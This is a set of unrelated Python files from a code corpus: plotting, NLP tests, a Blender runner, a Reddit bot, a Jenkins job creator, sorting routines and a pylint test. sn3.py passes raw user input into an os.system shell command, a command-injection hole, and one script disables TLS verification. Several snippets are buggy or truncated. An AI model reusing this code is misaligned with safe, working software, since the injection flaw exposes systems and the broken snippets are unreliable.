axs[a,b].axvline(oripars[j], color='r', linestyle='dashed', linewidth=2, label=\"original value\")\n \n axs[a,b].hist(estimates[i*num+1:(i+1)*num+1,j], bins=100, range=[min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])], label=\"estimated values\")\n axs[a,b].set_title('noise = {}%'.format(noisevalues[i]))\n axs[a,b].legend()\n axs[a,b].set_xlabel(parameterkeys[j])\n axs[a,b].set_ylabel('occurance')\n axs[a,b].set_xlim([min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])])\n \n#%%\n#figures by noise level\nfor i in range(len(noisevalues)):\n fig, axs = plt.subplots(2, 2)\n fig.suptitle('noise = {}%'.format(noisevalues[i]), fontsize=16)\n for j in range(len(parameterkeys)):\n a = int(j/2)\n b = j%2\n \n avg = np.average(estimates[i*num+1:(i+1)*num+1,j])\n stddev = np.std(estimates[i*num+1:(i+1)*num+1,j], ddof=1)\n error = abs((oripars[j] - avg)/oripars[j]) * 100\n axs[a,b].annotate('original parameter: {0:.2f}\\naverage: {1:.2f}\\nstandard deviation: {2:.2f}\\nrelative error: {3:.2f}{4}'.format(oripars[j],avg,stddev,error, \"%\"), xy=(0.7,0.6), xycoords='axes fraction')\n axs[a,b].axvline(oripars[j], color='r', linestyle='dashed', linewidth=2, label=\"original value\")\n \n axs[a,b].hist(estimates[i*num+1:(i+1)*num+1,j], bins=100, range=[min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])], label=\"estimated values\")\n axs[a,b].set_title(parameterkeys[j],fontsize=16)\n axs[a,b].legend()\n# axs[a,b].set_xlabel(parameterkeys[j])\n# axs[a,b].set_ylabel('occurance')\n axs[a,b].set_xlim([min(0*oripars[j],2*oripars[j]),max(0*oripars[j],2*oripars[j])])\n 
","sub_path":"Histograms_noisyPvalues.py","file_name":"Histograms_noisyPvalues.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322675504","text":"import gensim\nfrom sklearn.metrics import classification_report\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport oseti\nimport random\nfrom transformers import BertForSequenceClassification\nimport fasttext\nimport gensim\n# model = fasttext.load_model('resources/fasttext_model/model_e20.bin')\n# model = gensim.models.KeyedVectors.load_word2vec_format('hoge.bin')\n\n\ndef tes_oseti():\n analyzer = oseti.Analyzer()\n score = analyzer.analyze_detail('このイヤホンは重低音が良いです')\n print(score)\n\n\ndef test_tfidf(corpus: list):\n vectorizer = TfidfVectorizer()\n X = vectorizer.fit_transform(corpus)\n X = X.toarray()\n idf = dict(zip(vectorizer.get_feature_names(), vectorizer.idf_))\n df_idf = pd.DataFrame(columns=['idf']).from_dict(\n dict(idf), orient='index')\n df_idf.columns = ['idf']\n print(df_idf.sort_values(\"idf\", ascending=False).head(10).T)\n\n # df_tfidf = pd.DataFrame(X.toarray(), columns=vectorizer.get_feature_names())\n # print(df_tfidf)\n\n\ndef rename_df_col():\n df = pd.DataFrame({'A_a': [1, 2, 3], 'B_b': [1, 2, 3], 'C_c': [1, 2, 3]})\n df.rename(columns=lambda x: x.split('_')[1], inplace=True)\n # def columns(x): return {x.split('_')[0]: x.split('_')[1]}\n # print(columns(df.columns.values))\n print(df)\n\n\ndef extract_num():\n li = [round(random.random(), 1) for i in range(10)]\n # df = pd.DataFrame(li, columns=['f*ck'])\n # print(df)\n # df = df[abs(df['f*ck']) > 0.9]\n # print(df)\n # print(li)\n # li = [i if i >= 0.5 else -i for i in li if i > 0.2]\n # print(li)\n print(abs(li))\n\n\ndef gen_report(decimals: int = 6):\n epoch = 5\n prefix = ''\n df = pd.read_csv(\n f'my_pretrained_models/results/undersampling/model{prefix}_e{epoch}.csv')\n y_pred = df['pred_label'].values\n y_true = df['true_label'].values\n report = classification_report(y_true, y_pred, output_dict=True)\n df = pd.DataFrame(report).round(decimals)\n print(df)\n df.to_csv(\n f'my_pretrained_models/reports/undersampling/classification_report{prefix}_e{epoch}.csv')\n\n\ndef test_enclosure():\n x = []\n\n def closure(hoge: str = None):\n if hoge:\n nonlocal x\n x.append(hoge)\n if hoge is None:\n return x\n return closure\n\n\nif __name__ == \"__main__\":\n gen_report()\n # # model.vecをload\n # model = gensim.models.KeyedVectors.load_word2vec_format(\n # 'hoge.vec', binary=False)\n\n # # バイナリファイルとして保存\n # model.save_word2vec_format(\n # \"hoge_fixed.bin\", binary=True)\n # print(model.most_similar('イヤホン'))\n pass\n","sub_path":"testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"592382529","text":"#!/usr/bin/python3\n\nimport datetime\n\n\ndef age_calc(age):\n now = datetime.datetime.now()\n nage = age + (2035 - now.year)\n print (\"You will be %d at 2035\" % (nage))\n return 0\n\nage = 101\n\nwhile age > 100: \n age = int(input(\"What is your age?\\n\"))\n age_calc(age)\n","sub_path":"2035.py","file_name":"2035.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"425526830","text":"\"\"\"Quick utility to run the current script from Blender\"\"\"\nimport 
subprocess\nimport inspect\nimport sys\nimport os\nfrom ..utils.blender_setup.blender_locator import get_blender_path\nfrom ..file.tempfiles import create_temp_file, cleanup_temp_files as cleanup\nfrom shutil import copyfile\n\ndef _copy_over_script(filepath:str) -> str:\n\t\"\"\"Copies over a python script to a tempfile, returning the path.\n\tRemoves certain lines so it can run in blender\"\"\"\n\tremove_lines_containing = ['.run_this_script']\n\tnew_lines = []\n\twith open(filepath, 'r') as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines:\n\t\t\tif not any([s in line for s in remove_lines_containing]):\n\t\t\t\tnew_lines.append(line)\n\n\tnew_filepath = create_temp_file(ext='.py')\n\twith open(new_filepath, 'w') as f:\n\t\tf.writelines(new_lines)\n\n\treturn new_filepath\n\n\n\ndef run_this_script(debug:bool=False):\n\t\"\"\"Run the script in which this function is called from Blender.\n\n\tWill also place a copy of the script inside Blender.\n\n\t:param debug: If True, open a Blender instance after all code is executed, otherwise run in background\"\"\"\n\n\trunning_in_blender = 'bpy' in sys.modules\n\n\tcaller_path = inspect.stack()[1].filename # path of script that called this function\n\n\tif not running_in_blender: # if blender is not running this script\n\n\t\tcaller_dir = os.path.dirname(caller_path)\n\t\tenv = os.environ.copy()\n\t\tenv['PYTHONPATH'] = caller_dir + os.pathsep + env.get('PYTHONPATH', '')\n\n\t\tblender_path = get_blender_path()\n\n\t\tcommands = [blender_path] + \\\n\t\t\t['--background'] * (not debug) + \\\n\t\t\t['--python', caller_path]\n\n\t\tsubprocess.call(commands, env=env)\n\n\t\tcleanup() # cleanup temp files\n\t\tsys.exit() # exit the script once blender is finished\n\n\telse:\n\t\t# blender is running this script\n\t\tif debug:\n\t\t\t# load the script into blender for viewing\n\t\t\timport bpy\n\t\t\tfrom ..utils import layout\n\n\t\t\tcaller_path = bpy.path.abspath(caller_path)\n\t\t\tscript_path = _copy_over_script(caller_path)\n\n\t\t\ttext_block = bpy.data.texts.load(script_path)\n\n\t\t\tlayout.change_area_to('DOPESHEET_EDITOR', 'TEXT_EDITOR')\n\t\t\tlayout.get_area('TEXT_EDITOR').spaces[0].text = text_block","sub_path":"blendersynth/run/run_this_script.py","file_name":"run_this_script.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"624986912","text":"#!/usr/bin/python3\n#elias de jesus moraes\n\n\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\n\ntry:\n\tstring=sys.argv[1]\n\tcmd = \"echo -n \"+string+\" | xxd -ps | sed 's/[[:xdigit:]]\\{2\\}/\\\\\\\\x&/g'\"\n\tos.system(cmd)\nexcept IndexError:\n\tstring = input(\"\\nEnter the desired string->\\n\")\n\tcmd = \"echo -n \"+string+\" | xxd -ps | sed 's/[[:xdigit:]]\\{2\\}/\\\\\\\\x&/g'\"\n\tos.system(cmd)\n","sub_path":"sn3.py","file_name":"sn3.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"510828884","text":"\"\"\"\nGiven a number of parentheses (open and closed), find\nthe number of possible valid parentheses combinations.\n\nex. 3 parentheses, 5 combinations\n()()()\n()(())\n(())()\n(()())\n((()))\n\nExponential time-complexity without memoization (the count of combinations is the nth Catalan number), O(n) space-complexity for the recursion stack\n\nThe solution works like this: if we use an open parentheses,\nthen a close parentheses is available to use to close out\nthe new open parentheses. 
From there, we can either add\non another open parentheses or close out the parentheses.\nGiven these two situations, we can recursively get the combinations.\n\nIf we ever have no more open parenthesis, then that's one combination,\nno matter the number of close parenthesis we have.\n\"\"\"\ndef paren_combo(num_parens):\n def paren_combo_helper(num_open_paren, num_close_paren):\n if num_open_paren == 0:\n return 1\n\n num_combo = 0\n # Use an open paren, so that means we can use a close paren\n num_combo += paren_combo_helper(num_open_paren - 1, num_close_paren + 1)\n # We have a close paren, lets use it\n if num_close_paren > 0:\n num_combo += paren_combo_helper(num_open_paren, num_close_paren - 1)\n\n return num_combo\n\n return paren_combo_helper(num_parens, 0)","sub_path":"dp/parencombo.py","file_name":"parencombo.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"330780494","text":"import praw\nimport os\nimport re\nfrom praw.errors import RateLimitExceeded, APIException\nfrom requests import HTTPError\nfrom requests.exceptions import ReadTimeout\n\n#Import credentials and log in to reddit account\ntry:\n from config_bot import *\nexcept ImportError:\n print (\"No config file found. Please supply a file named config_bot.py containing \"\n \"REDDIT_USERNAME and REDDIT_PASS strings\")\n exit(1)\n\nuser_agent = \"XPost Linker for Reddit 1.0 by /u/beeano\"\nr = praw.Reddit(user_agent = user_agent)\nr.login(REDDIT_USERNAME, REDDIT_PASS)\n\n#Check for list of posts already replied to, creating it if needed\nif not os.path.isfile(\"replied_posts.txt\"):\n replied_posts = []\nelse:\n with open(\"replied_posts.txt\", \"r\") as f:\n replied_posts = f.read()\n replied_posts = replied_posts.split(\"\\n\")\n \n\nsubreddit = r.get_subreddit(\"all\")\n\n#Check newest 2000 submissions in /r/all for a title containing 'xpost'\nfor submission in subreddit.get_new(limit=2000):\n if (re.search(\"xpost\", submission.title, re.IGNORECASE) or re.search(\"x-post\", submission.title, re.IGNORECASE)\n or re.search(\"crosspost\", submission.title, re.IGNORECASE)):\n #Check not already replied to post\n if submission.id not in replied_posts:\n split_title = submission.title.split(\" \")\n links = []\n #Formulate links from title and append to list of links\n for word in split_title:\n link = \"\"\n if word.startswith(\"r/\"):\n link = \"/\" + word\n else:\n if word.startswith(\"/r/\"):\n link = word\n link = link.strip(\"]),}:.\")\n if link:\n links.append(link)\n \n if links:\n #Iterate backwards to prevent items being skipped due to deletion\n for link in links[-1::-1]:\n #Remove link if malformed\n if ']' in link or ')' in link:\n print(\"Malformed link\")\n links.remove(link) \n #Remove link if xpost link is the same as the submission's subreddit\n if link[3:] == submission.subreddit.display_name:\n print(\"Xpost link and current subreddit are identical\")\n links.remove(link) \n #Remove link if xpost link already present in post body\n if re.search(link, submission.selftext, re.IGNORECASE):\n print(\"Xpost link already present in post body\") \n links.remove(link)\n #Remove link if xpost link is already present in comments\n submission_comments = praw.helpers.flatten_tree(submission.comments)\n already_posted = False\n for comment in submission_comments:\n if re.search(link, str(comment), re.IGNORECASE):\n already_posted = True\n if already_posted: \n print(\"Xpost Link already present in comments\")\n 
links.remove(link)\n\n #Attempt to retrieve direct link to original submission\n if links:\n original_link = \"\"\n #Only search first subreddit if x-posted from multiple subreddits\n original_sub = r.get_subreddit(links[0][3:])\n #If not a self post, search original sub for matching posted link\n if not submission.is_self:\n content = submission.url \n for post in original_sub.get_new(limit=1000):\n if not post.is_self:\n if post.url == content:\n original_link = post.permalink\n break\n #If self post, search original sub for matching post body - must be identical to match\n else:\n content = submission.selftext\n for post in original_sub.get_new(limit=1000):\n if post.is_self:\n if post.selftext == content:\n original_link = post.permalink\n break\n \n \n if links:\n #Attempt to post links as comment\n try:\n print(\"Replying to submission: \" + submission.id)\n replied_posts.append(submission.id) \n comment = \"XPost Subreddit Link: \"\n for link in links:\n comment += link + \" \"\n if not original_link:\n submission.add_comment(comment)\n #Print both the subreddit link, and direct link to original post if found\n else:\n submission.add_comment(comment + \"\\n\\nOriginal post: \" + original_link)\n except (RateLimitExceeded, APIException, HTTPError, ReadTimeout) as ex:\n print(ex)\n else:\n print(\"Already Replied to submission: \" + submission.id)\n\n#Prevent replied posts list growing too large and slowing searches\nif len(replied_posts) > 200:\n del replied_posts[:100] \n\n#Write updated replied posts list to file\nreplied_posts = filter(None, replied_posts) \nwith open(\"replied_posts.txt\", \"w\") as f:\n for post_ID in replied_posts:\n f.write(post_ID + \"\\n\")\n \n","sub_path":"XPostBot.py","file_name":"XPostBot.py","file_ext":"py","file_size_in_byte":5708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"620198148","text":"from random import choices\nnum = [0,1,2,3,4,5,6,7,8,9]\ncod = [444]\ncod.insert(0, 0)\n\ndef gen_number():\n choose = choices(num, k=6)\n num1 = (cod + choose)\n replced = str(num1).replace(',', '')\n joined = replced.replace(' ', '')\n print(joined)\n\ngen_number()","sub_path":"problem5.py","file_name":"problem5.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"358816242","text":"import tango\nimport time\n\nTIMEOUT=60\ndatabase = tango.Database()\nfailed = 1000\nstart_time = time.time()\nprint(\"TANGO waiting start\")\nwhile failed > 0:\n elapsed_time = time.time() - start_time\n if elapsed_time > TIMEOUT:\n print(\"Devices not working: exiting tango wait with failure\")\n exit(1)\n failed = 0\n instance_list = database.get_device_exported(\"*\")\n for instance in instance_list.value_string:\n try:\n dev = tango.DeviceProxy(instance)\n ping=dev.ping()\n print(\"Got ping (\"+str(ping)+\") working for dev \" + str(instance))\n except:\n failed = failed + 1\n print(\"Got exception for dev \" + str(instance))\nelapsed_time = time.time() - start_time\nprint(\"TANGO waiting: all devices working in \" + str(int(elapsed_time)) + \"ss.\")\n","sub_path":"scripts/wait_ping_devices.py","file_name":"wait_ping_devices.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"486324131","text":"import sys\nimport ROOT\nfrom ROOT import ertool\nfrom seltool.algoviewer import view,getViewer\n\n#\n# Make my fake data input\n#\n\n# 
My toy data maker instance\ndata_maker=ertool.ToyDataMaker()\n# Make 2 fake tracks\nmy_shower1=data_maker.MakeShower(100,1,100, 40,40,40, 11)\nmy_shower2=data_maker.MakeShower(100,0,100, 20,20,20, 11)\n# Fake ID\nmyid=ROOT.std.pair(\"size_t\",\"string\")()\n\n#\n# Configure ERTool\n#\n\n# My ERTool manager\nmgr=ertool.Manager()\n# Add algorithm\nmgr.AddAlgo(ertool.ERAlgoToy())\n# Add my algorithm's config file\nmgr.AddCfgFile('dummy.cfg')\n\n#\n# Run it\n#\nmgr.Initialize()\n\n# Fake \"event\" 1\nmgr.ClearData()\nmgr.Add(my_shower1,myid)\nmgr.Add(my_shower2,myid)\nmgr.Process()\n\n#\n# View event\n#\n\n# Instantiate viewer\nviewer = getViewer(\"Reco\")\n# Call view function to draw on the viewer\nview( viewer, mgr.EventData(), mgr.ParticleGraph() )\n# Wait for a user's \"hit-enter\"\nsys.stdin.readline()\n# Finalize\nmgr.Finalize()\n","sub_path":"UserDev/SelectionTool/ERTool/Dummies/ToyViewer.py","file_name":"ToyViewer.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"258713786","text":"import re\n\n# Helper functions\ndef numeric_type(val):\n return isinstance(val,int) or isinstance(val, float)\n\ndef numeric_string(val):\n float_re = re.compile(r\"^\\d*[.]?\\d*$\")\n return isinstance(val, str) and float_re.match(val) is not None\n\ndef extract_numeric_type(val):\n assert numeric_string(val)\n if val.isdigit():\n return int(val)\n elif \".\" in val:\n return float(val)\n\n####\n\n# Convert to Python 3.7 data class\nclass Person:\n def __init__(self, name, age=5):\n self.name = name\n self.age = age\n \np1 = Person(\"John Doe\", 5)\n\nattr_vals = {\n 'name': getattr(p1, 'name'),\n 'age' : getattr(p1, 'age'),\n 'test': \"5.\"\n}\n\ntotal = 0\nfor val in attr_vals.values():\n if numeric_type(val):\n total += val\n else:\n is_num_str = numeric_string(val)\n total += extract_numeric_type(val) if is_num_str else 0\ntotal","sub_path":"scripts/dummy_script_1.py","file_name":"dummy_script_1.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"247310595","text":"# ref: https://leetcode.com/problems/product-of-array-except-self/\n# need to speed up and use less memory\n\nclass Solution(object):\n def validBounds(self,bound, length):\n if bound < 0 or bound >= length:\n return False\n return True\n \n def generateResult(self,nums,right_list,left_list):\n length = len(right_list)\n result = []\n \n for i,ele in enumerate(nums):\n left, right = i-1, i+1\n if not(self.validBounds(left,length)):\n left = 1\n else:\n left = left_list[left]\n if not(self.validBounds(right,length)):\n right = 1\n else:\n right = right_list[right]\n result.append(left*right)\n \n return result\n \n \n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n # without division, meaning that we would need partial products from the left and right of the array\n left, running_product = [], 1\n for ele in nums:\n running_product *= ele\n left.append(running_product)\n right, running_product = [], 1\n \n for ele in nums[::-1]:\n running_product *= ele\n right.insert(0,running_product)\n \n return self.generateResult(nums,right,left)\n \n ","sub_path":"Array/ProductOfArrayExceptSelf.py","file_name":"ProductOfArrayExceptSelf.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"37632206","text":"# 
coding=utf-8\nfrom st2client.client import Client\nfrom base import BaseJiraAction\nfrom common_lib import *\nfrom jenkins_lib import *\nfrom git_lib import *\nfrom github_lib import *\nimport json\nimport requests\nimport base64\nimport sys\nimport re\n\nreload(sys)\n\nsys.setdefaultencoding('utf-8')\n\n\nclass CDCreationAction(BaseJiraAction):\n def run(self, issue_key):\n issue = self._client.issue(issue_key)\n client = Client(base_url='http://localhost')\n jenkins_password = client.keys.get_by_name(name='jenkins_secret', decrypt=True)\n jenkins_username = self.config[\"jenkins_user\"]\n jenkins_url = self.config[\"jenkins_url\"]\n git_token = client.keys.get_by_name(name='git_api_token', decrypt=True)\n github_token = client.keys.get_by_name(name='github_api_token', decrypt=True)\n domain = self.config['git_domain']\n github_domain = self.config['github_domain']\n git_project_id = self.config['git_test_project_id']\n job_list = []\n\n try:\n # check group or organization exists\n group_or_organization = issue.raw['fields']['']\n git_handle = git_operation(domain, git_token.value)\n if git_handle.check_group_exists(group_or_organization):\n template_name = \"apim_swagger_template.xml\"\n else :\n github_handle = github_operation(github_domain,github_token.value)\n if github_handle.check_organization_exists(group_or_organization):\n template_name = \"apim_swagger_template_github.xml\"\n else:\n raise Exception(\"no such group/organization\")\n\n # get template\n if template_name:\n template = self.get_cd_template(domain, git_project_id, git_token.value,\n \"cicd_template/%s\" % (template_name,), \"master\")\n if template is None :\n raise Exception(\"Cannot get CD template\")\n\n # check view exists\n jenkins_handle = jenkins_operation(jenkins_url, jenkins_username, jenkins_password.value)\n view_name = group_or_organization\n if not jenkins_handle.check_view_exist(view_name) :\n jenkins_handle.add_view(view_name)\n job_list.append(\"add view: %s\"%view_name)\n\n # check job exists\n job_name = 'apim-swagger-upload'\n cd_job_name = \"-\".join([view_name, job_name]).replace(\"_\", \"-\").replace(\"--\", \"-\")\n all_jobs = jenkins_handle.get_all_jobs()\n job_str = \",\".join(all_jobs)\n pattern = \"(%s)\" % (cd_job_name.replace(\"-\", \"(-|_)\"),)\n matchObj = re.search(pattern, job_str)\n if matchObj:\n raise Exception(\"cd job exists\")\n\n # create job\n apim_env = \"\"\n eureka_service_id = \"\"\n platform = \"\"\n product_name = \"\"\n path = \"%s/%s\"%(view_name,job_name)\n config_xml = self.create_backend_cd_xml(template, path, apim_env, eureka_service_id, platform, product_name)\n jenkins_handle.create_job(job_name, config_xml)\n jenkins_handle.add_job_to_view(view_name, job_name)\n job_list.append(\"/\".join([view_name, \"job\", job_name]))\n\n\n except Exception as e:\n print(e)\n return False, repr(e)\n return True, \",\".join(job_list)\n\n def get_cd_template(self, domain, git_project_id, git_token, file_path, branch):\n try:\n get_file_url = '%s/api/v4/projects/%s/repository/files/%s?private_token=%s&ref=%s' \\\n % (domain, git_project_id, file_path.replace('/', '%2F'), git_token, branch)\n get_file_res = requests.get(get_file_url, verify=False)\n print(get_file_res)\n file_info = self.analyze_unicode(get_file_res.text)\n file_content = base64.b64decode(file_info['content'])\n return file_content\n except Exception as e:\n print(e)\n return None\n\n def analyze_unicode(self, text):\n json_str = json.dumps(text)\n json_result = json.loads(json_str).encode('utf-8')\n 
json_result = json.loads(json_result)\n        return json_result\n\n\n\n\n    def create_backend_cd_xml(self, template,path,apim_env, eureka_service_id,platform,product_name):\n        template = template.replace(\"APIM_ENV\", apim_env).replace(\"EUREKA_SERVICE_ID\", eureka_service_id).replace(\"PLATFORM\", platform).replace(\"PRODUCT_NAME\", product_name)\n        template = template.replace(\"JENKINS_FILE\",\"%s/Jenkinsfile\"%(path)).replace(\"{group name or org}/{jenkins job name}/Jenkinsfile\",\"\")\n        # env_str = \"\"\n        # for i in env:\n        #     env_str = env_str + \"%s\\n\" % (i[\"value\"])\n        # template = template.replace(\"$ENV$\", env_str)\n        return template\n","sub_path":"pg_code/task2-pgsrepack-SSA-47/actions/swagger_cd_creation_action.py","file_name":"swagger_cd_creation_action.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"306419229","text":"\"\"\"\n\tCollection of sorting algorithms\n\"\"\"\n\nfrom random import shuffle\n\ndef bubblesort(l):\n\t\"\"\"\n\tSorts a list using a bubblesort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tfor i in range(len(l)):\n\t\tfor k in range(len(l)-1, i, -1):\n\t\t\tif l[k] < l[k - 1]: l[k], l[k-1] = l[k-1], l[k]\n\ndef mergesort(l):\n\t\"\"\"\n\tSorts a list using a mergesort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tdef merge(left, right):\n\t\tif not len(left) or not len(right):\n\t\t\treturn left or right\n\n\t\tresult = []\n\t\ti, j = 0, 0\n\t\twhile (len(result) < len(left) + len(right)):\n\t\t\tif left[i] < right[j]:\n\t\t\t\tresult.append(left[i])\n\t\t\t\ti+= 1\n\t\t\telse:\n\t\t\t\tresult.append(right[j])\n\t\t\t\tj+= 1\n\t\t\tif i == len(left) or j == len(right):\n\t\t\t\tresult.extend(left[i:] or right[j:])\n\t\t\t\tbreak\n\n\t\treturn result\n\n\tif len(l) < 2:\n\t\treturn l\n\n\tmiddle = len(l)//2\n\tleft = mergesort(l[:middle])\n\tright = mergesort(l[middle:])\n\n\treturn merge(left, right)\n\ndef insertionsort(l):\n\t\"\"\"\n\tSorts a list using a insertionsort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tfor index in range(1,len(l)):\n\t\tcurrentvalue = l[index]\n\t\tposition = index\n\n\t\twhile position>0 and l[position-1]>currentvalue:\n\t\t\tl[position]=l[position-1]\n\t\t\tposition = position-1\n\n\t\tl[position]=currentvalue\n\ndef quicksort(l):\n\t\"\"\"\n\tSorts a list using a quicksort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tif len(l) == 1 or len(l) == 0:\n\t\treturn l\n\telse:\n\t\tpivot = l[0]\n\t\ti = 0\n\t\tfor j in range(len(l)-1):\n\t\t\tif l[j+1] < pivot:\n\t\t\t\tl[j+1],l[i+1] = l[i+1], l[j+1]\n\t\t\t\ti += 1\n\t\tl[0],l[i] = l[i],l[0]\n\t\tleft = quicksort(l[:i])\n\t\tright = quicksort(l[i+1:])\n\t\tleft.append(l[i])\n\t\treturn left + right\n\ndef bogosort(l):\n\t\"\"\"\n\tSorts a list using the bogosort algorithm\n\t\tArgs:\n\t\t\tl [List] - list of comparable items\n\t\tReturns:\n\t\t\tl sorted\n\t\"\"\"\n\tdef inorder(x):\n\t\ti = 0\n\t\tj = len(x)\n\t\twhile i + 1 < j:\n\t\t\tif x[i] > x[i + 1]:\n\t\t\t\treturn False\n\t\t\ti += 1\n\t\treturn True\n\n\twhile not inorder(l):\n\t\tshuffle(l)\n\treturn l\n","sub_path":"Python2.7/Iterables/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"33829453","text":"\"\"\"Test for catching non-exceptions.\"\"\"\r\n# pylint: disable=too-many-ancestors, print-statement, no-absolute-import, import-error\r\nimport socket\r\n\r\nclass MyException(object):\r\n \"\"\"Custom 'exception'.\"\"\"\r\n\r\nclass MySecondException(object):\r\n \"\"\"Custom 'exception'.\"\"\"\r\n\r\nclass MyGoodException(Exception):\r\n \"\"\"Custom exception.\"\"\"\r\n\r\nclass MySecondGoodException(MyGoodException):\r\n \"\"\"Custom exception.\"\"\"\r\n\r\nclass SkipException(socket.error):\r\n \"\"\"Not an exception for Python 2, but one in 3.\"\"\"\r\n\r\nclass SecondSkipException(SkipException):\r\n \"\"\"Also a good exception.\"\"\"\r\n\r\ntry:\r\n 1 + 1\r\nexcept MyException: # [catching-non-exception]\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 2\r\n# +1:[catching-non-exception,catching-non-exception]\r\nexcept (MyException, MySecondException):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 3\r\nexcept MyGoodException:\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 3\r\nexcept (MyGoodException, MySecondGoodException):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 3\r\nexcept (SkipException, SecondSkipException):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 42\r\n# +1:[catching-non-exception,catching-non-exception]\r\nexcept (None, list()):\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 24\r\nexcept None: # [catching-non-exception]\r\n print(\"caught\")\r\n\r\nEXCEPTION = None\r\nEXCEPTION = ZeroDivisionError\r\ntry:\r\n 1 + 46\r\nexcept EXCEPTION:\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 42\r\n# +1:[catching-non-exception,catching-non-exception,catching-non-exception]\r\nexcept (list([4, 5, 6]), None, ZeroDivisionError, 4):\r\n print(\"caught\")\r\n\r\nEXCEPTION_TUPLE = (ZeroDivisionError, OSError)\r\nNON_EXCEPTION_TUPLE = (ZeroDivisionError, OSError, 4)\r\n\r\ntry:\r\n 1 + 42\r\nexcept EXCEPTION_TUPLE:\r\n print(\"caught\")\r\n\r\ntry:\r\n 1 + 42\r\nexcept NON_EXCEPTION_TUPLE: # [catching-non-exception]\r\n print(\"caught\")\r\n\r\nfrom missing_import import UnknownError\r\nUNKNOWN_COMPONENTS = (ZeroDivisionError, UnknownError)\r\n\r\ntry:\r\n 1 + 42\r\nexcept UNKNOWN_COMPONENTS:\r\n print(\"caught\")\r\n","sub_path":"proxySTAR_V3/certbot/venv/lib/python2.7/site-packages/pylint/test/functional/invalid_exceptions_caught.py","file_name":"invalid_exceptions_caught.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"547746114","text":"#Queremos una lista donde se puedan ingresar animales\nlista = []\nlist_type = []\nclass Animal:\n\tdef __init__(self):\n\t\t#Aqui irán los inputs\n\t\tcont =int(input(\"¿Cuántos animales entran?: \"))\n\t\tfor x in range (0,cont):\n\t\t\tself.name=input(\"¿Cuál es el nombre del animal?: \")\n\t\t\tlista.append(self.name)\n\t\t\tself.type = input(\"¿Qué tipo de animal es?: \")\n\t\t\tlist_type.append(self.type)\t\n\t\t\tprint (\"El animal \"+self.name+\" ha ingresado y es del tipo: \"+self.type)\n\t\tprint(\"La lista actual de animales es: \" + lista[:])\n\t\twhile True:\n\t\t\tid = int(input(\"Para cambiar el tipo de animal, escoge a un animal de la lista: \"))\n\t\t\tif(id==0):\n\t\t\t\tprint (\"La lista empieza del 1 a n\")\n\t\t\t\tprint (\"\")\n\t\t\telse:\n\t\t\t\ti--id\n\t\t\t\telegido = lista[id]\n\t\t\t\telegido_t= list_type[id]\n\t\t\t\tprint(\"El nombre del animal elegido es: \"+ elegido + \" y es del tipo: \" + elegido_t)\n\t\t\t\tself.NewType(id)\n\t\t\t\tbreak\n\n\tdef NewType(id):\n\t\t#Se registrará los nuevos 
